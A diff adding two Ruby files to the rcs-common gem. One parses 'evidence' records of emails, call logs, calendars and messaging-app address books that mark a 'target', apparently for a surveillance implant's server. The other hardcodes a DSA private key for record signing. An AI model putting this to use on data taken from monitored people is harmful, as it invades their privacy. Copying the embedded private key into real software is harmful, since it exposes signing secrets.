rcs-common 9.6.0

data/lib/rcs-common/serializer.rb

@@ -0,0 +1,404 @@
+require 'stringio'
+require_relative 'trace'
+require_relative 'evidence/common'
+
+require 'rcs-common/trace'
+
+class StringIO
+  def read_dword
+    self.read(4).unpack('L').shift
+  end
+end
+
+module RCS
+
+  module Serialization
+    PREFIX_MASK = 0x00FFFFFF
+
+    def self.prefix(type, size)
+      [(type << 0x18) | size].pack('L')
+    end
+
+    def self.decode_prefix(str)
+      prefix = str.unpack('L').shift
+      return (prefix & ~PREFIX_MASK) >> 0x18, prefix & PREFIX_MASK
+    end
+  end
+
+  class MAPISerializer
+    include RCS::Tracer
+
+    attr_reader :fields, :size, :delivery_time, :flags
+
+    TYPES = {0x03 => {field: :from, action: :unserialize_string},
+             0x04 => {field: :rcpt, action: :unserialize_string},
+             0x05 => {field: :cc, action: :unserialize_string},
+             0x06 => {field: :bcc, action: :unserialize_string},
+             0x07 => {field: :subject, action: :unserialize_string},
+             0x80 => {field: :mime_body, action: :unserialize_blob},
+             0x84 => {field: :text_body, action: :unserialize_blob}
+             }
+
+    def initialize
+      @fields = {}
+    end
+
+    def unserialize(stream)
+
+      # HEADER
+      header_begin = stream.pos
+
+      tot_size = stream.read_dword
+      @version = stream.read_dword
+      @status = stream.read_dword
+      @flags = stream.read_dword
+      @size = stream.read_dword
+      low, high = stream.read(8).unpack 'V2'
+      @delivery_time = Time.from_filetime high, low
+      @n_attachments = stream.read_dword
+
+      # BODY
+      header_length = stream.pos - header_begin
+      content = stream.read(tot_size - header_length)
+      until content.empty?
+        prefix = content.slice!(0, 4)
+        type, size = Serialization.decode_prefix prefix
+        str = content.slice!(0, size)
+        selector = TYPES[type]
+        unless selector.nil?
+          @fields[selector[:field]] = self.send(selector[:action], str) if TYPES.has_key? type
+        end
+      end
+
+      self
+    end
+
+    def unserialize_string(str)
+      str.utf16le_to_utf8
+    end
+
+    def unserialize_blob(str)
+      str
+    end
+  end
+
+  class CallListSerializer
+    include RCS::Tracer
+
+    TYPES = {0x01 => :name, 0x02 => :type, 0x04 => :note, 0x08 => :number}
+    INCOMING = 0x00
+    OUTGOING = 0x01
+
+    attr_reader :start_time, :end_time, :fields, :properties
+
+    def initialize
+      @fields = {}
+      @start_time = nil
+      @end_time = nil
+      @properties = []
+    end
+
+    def unserialize(stream)
+
+      # HEADER
+      header_begin = stream.pos
+
+      tot_size = stream.read(4).unpack('L').shift
+      version = stream.read(4).unpack('L').shift
+
+      low, high = stream.read(8).unpack 'V2'
+      @start_time = Time.from_filetime high, low
+      low, high = stream.read(8).unpack 'V2'
+      @end_time = Time.from_filetime high, low
+
+      props = stream.read(4).unpack('L').shift
+      if props & OUTGOING == 1
+        @properties << :outgoing
+      else
+        @properties << :incoming
+      end
+
+      # BODY
+      header_length = stream.pos - header_begin
+      content = stream.read(tot_size - header_length)
+
+      until content.empty?
+        prefix = content.slice!(0, 4)
+        type, size = Serialization.decode_prefix prefix
+        @fields[TYPES[type]] = content.slice!(0, size).utf16le_to_utf8
+      end
+
+      self
+    end
+  end
+
+  class CalendarSerializer
+    include RCS::Tracer
+
+    POOM_V1_0_PROTO = 0x01000000
+    FLAG_RECUR = 0x00000008
+
+    attr_reader :start_date, :end_date, :fields
+
+    CALENDAR_TYPES = { 0x01 => :subject,
+                       0x02 => :categories,
+                       0x04 => :body,
+                       0x08 => :recipients,
+                       0x10 => :location}
+
+    def initialize
+      @fields = {}
+      @start_date = nil
+      @end_date = nil
+    end
+
+    def unserialize(stream)
+      header_begin = stream.pos
+
+      tot_size = stream.read(4).unpack('L').shift
+      version = stream.read(4).unpack('L').shift
+      oid = stream.read(4).unpack('L').shift
+
+      raise EvidenceDeserializeError.new("Invalid version") unless version == POOM_V1_0_PROTO
+
+      # BODY
+      header_length = stream.pos - header_begin
+      content = stream.read(tot_size - header_length)
+      until content.empty?
+        @flags = content.slice!(0, 4).unpack('L').shift
+
+        ft_low = content.slice!(0, 4).unpack('L').shift
+        ft_high = content.slice!(0, 4).unpack('L').shift
+        @start_date = Time.from_filetime(ft_high, ft_low)
+
+        ft_low = content.slice!(0, 4).unpack('L').shift
+        ft_high = content.slice!(0, 4).unpack('L').shift
+        @end_date = Time.from_filetime(ft_high, ft_low)
+
+        @sensitivity = content.slice!(0, 4).unpack('L').shift
+        @busy = content.slice!(0, 4).unpack('L').shift
+        @duration = content.slice!(0, 4).unpack('L').shift
+        @status = content.slice!(0, 4).unpack('L').shift
+
+        if @flags == FLAG_RECUR
+          return self if content.bytesize < 28 + 16 # struct _TaskRecur
+
+          type, interval, month_of_year, day_of_month, day_of_week_mask, instance, occurrences = *content.slice!(0, 28).unpack("L*")
+          ft_low = content.slice!(0, 4).unpack('L').shift
+          ft_high = content.slice!(0, 4).unpack('L').shift
+          @pattern_start_date = Time.from_filetime(ft_high, ft_low)
+
+          ft_low = content.slice!(0, 4).unpack('L').shift
+          ft_high = content.slice!(0, 4).unpack('L').shift
+          @pattern_end_date = Time.from_filetime(ft_high, ft_low)
+        end
+
+        until content.empty? do
+          prefix = content.slice!(0, 4)
+          type, size = Serialization.decode_prefix prefix
+          @fields[CALENDAR_TYPES[type]] = content.slice!(0, size).utf16le_to_utf8 if CALENDAR_TYPES.has_key? type
+        end
+      end
+
+      self
+    end
+
+  end #CalendarSerializer
+
+  class AddressBookSerializer
+    include RCS::Tracer
+
+    attr_reader :name, :contact, :info, :type, :program, :handles
+
+    POOM_V1_0_PROTO = 0x01000000
+    POOM_V2_0_PROTO = 0x01000001
+
+    LOCAL_CONTACT = 0x80000000
+
+    ADDRESSBOOK_TYPES = { 0x1 => :first_name,
+                          0x2 => :last_name,
+                          0x3 => :company,
+                          0x4 => :business_fax_number,
+                          0x5 => :department,
+                          0x6 => :email_1,
+                          0x7 => :mobile_phone_number,
+                          0x8 => :office_location,
+                          0x9 => :pager_number,
+                          0xA => :business_phone_number,
+                          0xB => :job_title,
+                          0xC => :home_phone_number,
+                          0xD => :email_2,
+                          0xE => :spouse,
+                          0xF => :email_3,
+                          0x10 => :home_2_phone_number,
+                          0x11 => :home_fax_number,
+                          0x12 => :car_phone_number,
+                          0x13 => :assistant_name,
+                          0x14 => :assistant_phone_number,
+                          0x15 => :children,
+                          0x16 => :categories,
+                          0x17 => :web_page,
+                          0x18 => :business_2_phone_number,
+                          0x19 => :radio_phone_number,
+                          0x1A => :file_as,
+                          0x1B => :yomi_company_name,
+                          0x1C => :yomi_first_name,
+                          0x1D => :yomi_last_name,
+                          0x1E => :title,
+                          0x1F => :middle_name,
+                          0x20 => :suffix,
+                          0x21 => :home_address_street,
+                          0x22 => :home_address_city,
+                          0x23 => :home_address_state,
+                          0x24 => :home_address_postal_code,
+                          0x25 => :home_address_country,
+                          0x26 => :other_address_street,
+                          0x27 => :other_address_city,
+                          0x28 => :other_address_postal_code,
+                          0x29 => :other_address_country,
+                          0x2A => :business_address_street,
+                          0x2B => :business_address_city,
+                          0x2C => :business_address_state,
+                          0x2D => :business_address_postal_code,
+                          0x2E => :business_address_country,
+                          0x2F => :other_address_state,
+                          0x30 => :body,
+                          0x31 => :birthday,
+                          0x32 => :anniversary,
+                          0x33 => :screen_name,
+                          0x34 => :phone_numbers,
+                          0x35 => :address,
+                          0x36 => :notes,
+                          0x37 => :unknown,
+                          0x38 => :facebook_page,
+                          0x40 => :handle}
+
+    ADDRESSBOOK_PROGRAM = {
+        0x01 => :outlook,
+        0x02 => :skype,
+        0x03 => :facebook,
+        0x04 => :twitter,
+        0x05 => :gmail,
+        0x06 => :bbm,
+        0x07 => :whatsapp,
+        0x08 => :phone,
+        0x09 => :mail,
+        0x0a => :linkedin,
+        0x0b => :viber,
+        0x0c => :wechat,
+        0x0d => :line,
+        0x0e => :telegram,
+        0x0f => :yahoo,
+        0x10 => :messages,
+        0x11 => :contacts
+    }
+
+    TYPE_FLAGS = {
+        twitter: {0x00 => :friend, 0x01 => :follower}
+    }
+
+    def initialize
+      @fields = {}
+      @handles = []
+      @poom_strings = {}
+      ADDRESSBOOK_TYPES.each_pair do |k, v|
+        @poom_strings[v] = v.to_s.gsub(/_/, " ").capitalize.encode('UTF-8')
+      end
+      @poom_strings[:unknown] = nil # when unknown, field name is given by agent
+    end
+
+    def serialize(fields)
+      stream = StringIO.new
+      fields.each_pair do |type, str|
+        utf16le_str = str.to_utf16le_binary_null
+        stream.write Serialization.prefix(ADDRESSBOOK_TYPES.invert[type], utf16le_str.bytesize)
+        stream.write utf16le_str
+      end
+      header = [stream.pos + 20, POOM_V2_0_PROTO, 0].pack('L*')
+      header += [ADDRESSBOOK_PROGRAM.invert[:contacts], [0, LOCAL_CONTACT].sample].pack('L*')
+
+      return header + stream.string
+    end
+
+    def unserialize(stream)
+
+      header_begin = stream.pos
+
+      # discard header
+      tot_size = stream.read(4).unpack("L").shift
+      version = stream.read(4).unpack("L").shift
+      oid = stream.read(4).unpack("L").shift
+
+      if version != POOM_V1_0_PROTO and version != POOM_V2_0_PROTO
+        raise EvidenceDeserializeError.new("Invalid addressbook version (#{version})")
+      end
+
+      case version
+        when POOM_V1_0_PROTO
+          program = 0
+          flags = 0
+        when POOM_V2_0_PROTO
+          program = stream.read(4).unpack("L").shift
+          flags = stream.read(4).unpack("L").shift
+      end
+
+      # initialize the values to array
+      @fields = Hash.new {|h,k| h[k] = []}
+
+      # BODY
+      header_length = stream.pos - header_begin
+      content = stream.read(tot_size - header_length)
+      until content.empty?
+        type, size = Serialization.decode_prefix content.slice!(0, 4)
+        str = content.slice!(0, size).utf16le_to_utf8
+        #trace :debug, "ADDRESSBOOK FIELD #{ADDRESSBOOK_TYPES[type]} = #{str}"
+        @fields[ADDRESSBOOK_TYPES[type]] << str if ADDRESSBOOK_TYPES.has_key? type
+      end
+
+      # name
+      @name = ""
+      @name = @fields[:first_name].first if @fields.has_key? :first_name
+      @name += " " + @fields[:last_name].first if @fields.has_key? :last_name
+
+      @program = ADDRESSBOOK_PROGRAM[program]
+      @program ||= :unknown
+
+      @type = TYPE_FLAGS[@program][flags] if TYPE_FLAGS.has_key? @program
+      @type ||= :peer
+      @type = :target if (flags & LOCAL_CONTACT != 0)
+
+      # choose the most significant contact field (the handle)
+      @contact = ""
+      if @fields.has_key? :handle
+        @contact = @fields[:handle].first
+        @handles << {type: @program, handle: @fields[:handle].first}
+      end
+
+      #trace :debug, "FIELDS: #{@fields.inspect}"
+
+      # info
+      @info = ""
+      omitted_fields = [:first_name, :last_name, :body, :file_as]
+      @fields.each_pair do |k, v|
+        next if omitted_fields.include? k
+        v.each do |entry|
+          str = @poom_strings[k]
+          add_to_handles(str, entry) if str and entry
+          @info += str.nil? ? "" : "#{str}: "
+          @info += entry
+          @info += "\n"
+        end
+      end
+
+      self
+    end
+
+    def add_to_handles(key, value)
+      # only take the phones and mails
+      return if key['phone'].nil? and key['mail'].nil?
+      @handles << {type: 'phone', handle: value} if key['phone']
+      @handles << {type: 'mail', handle: value} if key['mail']
+    end
+
+  end # ::PoomSerializer
+end # ::RCS

data/lib/rcs-common/signature.rb

@@ -0,0 +1,141 @@
+require 'base64'
+require 'openssl'
+require 'json'
+
+module RCS
+  module Mongoid
+    module Signature
+      extend ActiveSupport::Concern
+
+      DSA_PRIV_KEY = <<END
+-----BEGIN DSA PRIVATE KEY-----
+MIIDVgIBAAKCAQEAs/Le9TeFwd6Wp0ZaSwthvKcYmMkewqyx3L+xl7S4EkQOI4ky
+9n4Yp4LJ2EnIdo6iwj5fLcxTXRPem1uWaPNXT0ILKWr6Eu9yetgKaiK6i+Iy8Rtb
+XA2e/CEh+Hl4zL5UnNLQcxtZ7pYML6Lq7h27OTyXFU4tZsxSH1oSdr0KJE7kHmij
+gLaub5yjjBQF8pcADpWHih06NQ6zj7rKEXH2RLgiE3dZbN29VqP3/edx1XASuoAd
+6DKzfYH8H9Pp6mMI9s2+kzvLdnubuDdq+rA3aSZC+iHczBUCjbdshLzsyac4et5b
+wjRIKZmA674InCKq2MVZjJPoE1jmoPpINigo2QIhAIn55YqthSk3B044NJSL7pfg
+UwrWAT00RAuKoB849MSRAoIBAGcdWSnhTjRbWV23niaLnDGH+s/v9UGcokGQiTU9
+4Yy+6fVaFoNqs6s4wfcGaQDQIUDZ67dMU2ARkImLjxAN/DOnopXtwdZQXd9vXoMp
+Qi89lfJ8/elwW4nAY9cWnyl67shv17vyjJZATMvH8/YvyphDJDUh191z3MGu/6O+
+yRuZcJ0aqyvcbGpj0zox9oFLnNltroeB7zExeJ5GFcVrZQ5Tza07LcRBjAbo0Icw
+F6bNVRadrLRywwxE+zym73Vz4x48euoKo95AsevOFQ+osIlDEL1BkPKa9jiEFTHq
+XBleabczfnBYTOIwNWKuUXeboBpjNX5ZPzOu+UvnRr9JLDMCggEBAJhmfz1PDIA5
+TvfUyUT9NkLUpQk5EOvQ4fAQx7ktETA683lEZR+sdL66aEheqEwMRor1DofM/gYO
+WAE+tzusnPZ/yrP6mrLXeWrWbjM0gdcbW2NVR7Vh6s3fziX6UIxpmBeWitqYE4PH
+ue9p6meRhHxR5HB2ws9EldxCN/sgqOvVIAhfbla0WMd1kEkSi9Zoitl43LtP2GhJ
+pb+O4eBoOfdC4c3eYlHgXYAEo5CYytDF+Rv51Mu9BsqPfcPsAGgaAQLugqLYYHRw
+LKzCzBPvkAF1C+zW+Qk+FrZbwhBqiJBSXH7IxM+6OrQxLR+lJuLBSkSap30TFBc7
+g3zksvKZdi0CIEPlMqeN/iQIXzjDP9L8ofSkoo/x7ixyaHHk6CjmoWMm
+-----END DSA PRIVATE KEY-----
+END
+
+      DSA_PUB_KEY = <<END
+-----BEGIN PUBLIC KEY-----
+MIIDRzCCAjkGByqGSM44BAEwggIsAoIBAQCz8t71N4XB3panRlpLC2G8pxiYyR7C
+rLHcv7GXtLgSRA4jiTL2fhingsnYSch2jqLCPl8tzFNdE96bW5Zo81dPQgspavoS
+73J62ApqIrqL4jLxG1tcDZ78ISH4eXjMvlSc0tBzG1nulgwvouruHbs5PJcVTi1m
+zFIfWhJ2vQokTuQeaKOAtq5vnKOMFAXylwAOlYeKHTo1DrOPusoRcfZEuCITd1ls
+3b1Wo/f953HVcBK6gB3oMrN9gfwf0+nqYwj2zb6TO8t2e5u4N2r6sDdpJkL6IdzM
+FQKNt2yEvOzJpzh63lvCNEgpmYDrvgicIqrYxVmMk+gTWOag+kg2KCjZAiEAifnl
+iq2FKTcHTjg0lIvul+BTCtYBPTREC4qgHzj0xJECggEAZx1ZKeFONFtZXbeeJouc
+MYf6z+/1QZyiQZCJNT3hjL7p9VoWg2qzqzjB9wZpANAhQNnrt0xTYBGQiYuPEA38
+M6eile3B1lBd329egylCLz2V8nz96XBbicBj1xafKXruyG/Xu/KMlkBMy8fz9i/K
+mEMkNSHX3XPcwa7/o77JG5lwnRqrK9xsamPTOjH2gUuc2W2uh4HvMTF4nkYVxWtl
+DlPNrTstxEGMBujQhzAXps1VFp2stHLDDET7PKbvdXPjHjx66gqj3kCx684VD6iw
+iUMQvUGQ8pr2OIQVMepcGV5ptzN+cFhM4jA1Yq5Rd5ugGmM1flk/M675S+dGv0ks
+MwOCAQYAAoIBAQCYZn89TwyAOU731MlE/TZC1KUJORDr0OHwEMe5LREwOvN5RGUf
+rHS+umhIXqhMDEaK9Q6HzP4GDlgBPrc7rJz2f8qz+pqy13lq1m4zNIHXG1tjVUe1
+YerN384l+lCMaZgXloramBODx7nvaepnkYR8UeRwdsLPRJXcQjf7IKjr1SAIX25W
+tFjHdZBJEovWaIrZeNy7T9hoSaW/juHgaDn3QuHN3mJR4F2ABKOQmMrQxfkb+dTL
+vQbKj33D7ABoGgEC7oKi2GB0cCyswswT75ABdQvs1vkJPha2W8IQaoiQUlx+yMTP
+ujq0MS0fpSbiwUpEmqd9ExQXO4N85LLymXYt
+-----END PUBLIC KEY-----
+END
+
+      included do
+        cattr_accessor :signature_fields
+        self.signature_fields = []
+
+        cattr_accessor :signature_chained
+        self.signature_chained = false
+
+        cattr_accessor :dsa_priv, :dsa_pub
+        self.dsa_priv = OpenSSL::PKey::DSA.new(DSA_PRIV_KEY)
+        self.dsa_pub = OpenSSL::PKey::DSA.new(DSA_PUB_KEY)
+
+        field :signature, type: Hash, default: {}
+
+        set_callback :create, :before, :set_signature
+        set_callback :update, :before, :set_signature
+      end
+
+      def set_signature
+        now = Time.now.getutc.to_f
+
+        # save the version and the fields used to calculate the signature
+        # this could help in the future if the signature_fields are changed
+        hash = {version: 1,
+                fields: signature_fields,
+                timestamp: now}
+
+        #puts "SET: #{signature_fields} => #{concat_values(hash, signature_fields)}"
+
+        # calculate the digest
+        digest = OpenSSL::Digest::SHA256.digest(concat_values(hash, signature_fields))
+        # sign the digest
+        sig = dsa_priv.syssign(digest)
+
+        # put the dsa signature in the hash and save it
+        hash[:signature] = Base64.strict_encode64(sig)
+        self.signature[:integrity] = Base64.strict_encode64(hash.to_json)
+      end
+
+      def check_signature
+        # load the serialized signature
+        hash = JSON.parse(Base64.decode64(self.signature[:integrity])).with_indifferent_access
+
+        # extract and remove the dsa signature from the hash
+        sig = Base64.decode64(hash.delete(:signature))
+
+        #puts "CHECK: #{signature_fields} => #{concat_values(hash, hash[:fields])}"
+
+        # calculate the digest
+        digest = OpenSSL::Digest::SHA256.digest(concat_values(hash, hash[:fields]))
+        # verify the integrity
+        dsa_pub.sysverify(digest, sig)
+      rescue Exception => e
+        #puts e.message
+        #puts e.backtrace.join("\n")
+        false
+      end
+
+      def signature_fields
+        self.class.signature_fields
+      end
+
+      private
+
+      def concat_values(hash, keys)
+        # always include the id of the document to prevent cloning of document
+        # also include the hash itself (with timestamp) to prevent replay attack
+        text = self[:_id].to_s + '|' + hash.to_json + '|'
+
+        # concatenate all the other fields
+        keys.each do |key|
+          # use json serialization here, since it works for strings, integers, complex arrays or hashes...
+          text << self[key].to_json + '|' unless self[key].blank?
+        end
+
+        return text
+      end
+
+      module ClassMethods
+        def sign_options(options)
+          self.signature_fields = options[:include] if options[:include]
+        end
+      end
+
+    end
+  end
+end